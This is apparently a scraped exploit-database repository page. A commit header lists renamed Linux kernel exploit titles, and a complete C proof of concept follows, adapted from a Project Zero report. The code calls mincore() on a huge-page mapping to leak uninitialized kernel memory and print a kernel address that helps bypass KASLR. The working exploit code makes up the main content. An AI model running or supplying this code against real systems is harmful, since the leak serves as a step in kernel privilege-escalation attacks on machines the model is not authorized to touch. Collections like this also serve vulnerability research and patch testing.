224c305b0d
9 changes to exploits/shellcodes Linux 2.6.37-rc1 - serial_core TIOCGICOUNT Leak Linux Kenel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak Linux 2.6.36 IGMP - Remote Denial of Service Linux Kernel 2.6.36 IGMP - Remote Denial of Service Linux - SELinux W+X Protection Bypass via AIO Linux SELinux - W+X Protection Bypass via AIO Linux group_info refcounter - Overflow Memory Corruption Linux Kernel - 'group_info' refcounter Overflow Memory Corruption Linux io_submit L2TP sendmsg - Integer Overflow Linux Kernel - io_submit L2TP sendmsg Integer Overflow Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited Linux ARM/ARM64 - 'perf_event_open()' Arbitrary Memory Read Linux Kernel (ARM/ARM64) - 'perf_event_open()' Arbitrary Memory Read Linux - 'mincore()' Uninitialized Kernel Heap Page Disclosure Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) Linux Kernel < 4.5.1 - Off-By-One (PoC) Linux Kernel - 'mincore()' Heap Page Disclosure (PoC) Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) - libc NLSPATH Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Local Buffer Overflow Linux libc 5.3.12/5.4 (RedHat Linux 4.0) - 'vsyslog()' Local Buffer Overflow Linux 6.1/6.2/7.0/7.1 Man Page - Source Buffer Overflow Linux Man Page 6.1/6.2/7.0/7.1- Source Buffer Overflow Linux VServer Project 1.2x - CHRoot Breakout Linux VServer Project 1.2x - Chroot Breakout Linux espfix64 - Nested NMIs Interrupting Privilege Escalation Linux (x86) - Memory Sinkhole Privilege Escalation Linux Kernel - 'espfix64' Nested NMIs Interrupting Privilege Escalation Linux Kernel (x86) - Memory Sinkhole Privilege Escalation Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass Linux Kernel 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass Linux - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation Linux Kernel - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation
40 lines
No EOL
1.2 KiB
C
40 lines
No EOL
1.2 KiB
C
/*
|
|
* The source is modified from
|
|
* https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
|
|
* I try to find out infomation useful from the infoleak
|
|
* The kernel address can be easily found out from the uninitialized memory
|
|
* leaked from kernel, which can help bypass kaslr
|
|
*/
|
|
|
|
#define _GNU_SOURCE
|
|
#include <unistd.h>
|
|
#include <sys/mman.h>
|
|
#include <err.h>
|
|
#include <stdio.h>
|
|
|
|
int main(void) {
|
|
unsigned char buf[getpagesize()/sizeof(unsigned char)];
|
|
int right = 1;
|
|
unsigned long addr = 0;
|
|
|
|
/* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
|
|
if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)
|
|
err(1, "mmap");
|
|
|
|
while(right){
|
|
/* Touch a mishandle with this type mapping */
|
|
if (mincore((void*)0x86000000, 0x1000000, buf))
|
|
perror("mincore");
|
|
for( int n=0; n<getpagesize()/sizeof(unsigned char); n++) {
|
|
addr = *(unsigned long*)(&buf[n]);
|
|
/* Kernel address space, may need some mask&offset */
|
|
if(addr > 0xffffffff00000000){
|
|
right = 0;
|
|
goto out;
|
|
}
|
|
}
|
|
}
|
|
out:
|
|
printf("%p\n", addr);
|
|
return 0;
|
|
} |